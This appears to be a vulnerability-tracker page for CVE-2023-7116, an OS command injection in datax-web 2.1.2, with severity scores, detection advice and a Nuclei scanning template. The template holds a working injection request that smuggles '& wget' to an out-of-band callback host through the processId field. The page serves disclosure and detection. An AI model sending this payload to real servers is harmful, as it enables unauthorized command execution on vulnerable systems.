CVE-2023-7116
published 2023-12-27CVE-2023-7116: A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the…
PriorityP275critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
9.90%
95.0th percentile
A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the file /api/log/killJob of the component HTTP POST Request Handler. The manipulation of the argument processId leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249086 is the identifier assigned to this vulnerability.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| datax-web_project | datax-web | — | — |
| weiye-jing | datax-web | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for HTTP POST requests to /api/log/killJob with a JSON body containing the 'processId' parameter with shell metacharacters (e.g., &, |, ;) indicating OS command injection attempts. ↗
- →The exploit triggers an out-of-band HTTP callback (e.g., via wget to an interactsh/canary URL); monitor for unexpected outbound HTTP requests from the datax-web server process. ↗
- →Match on Content-Type: application/json POST requests to /api/log/killJob where the processId value contains non-numeric characters or shell operators. ↗
- ·The vulnerability affects specifically WeiYe-Jing datax-web version 2.1.2; detections should be scoped to environments running this version. ↗
- ·The attack is remotely exploitable with no authentication barrier mentioned; the endpoint /api/log/killJob should be treated as unauthenticated or weakly authenticated in detection logic. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WeiYe-Jing datax-web <= 2.1.2 - OS Command Injection
nuclei·CVSS 9.8
CVE-2023-7116 [CRITICAL] WeiYe-Jing datax-web <= 2.1.2 - OS Command Injection
WeiYe-Jing datax-web Datax Web"
internal: true
- raw:
- |
POST /api/log/killJob HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/json
{"processId":"1 & wget http://{{interactsh-url}}"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200
# digest: 4a0a0047304502205889d82fc4d17e6662c5eb4df89749215481729f3f779fb88f495defbef9e6cf022100825ce7df770162b0e60bc67fd27bd68020c24bcd4187148f7ff2e0a43c214a88:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2023-12-27
Published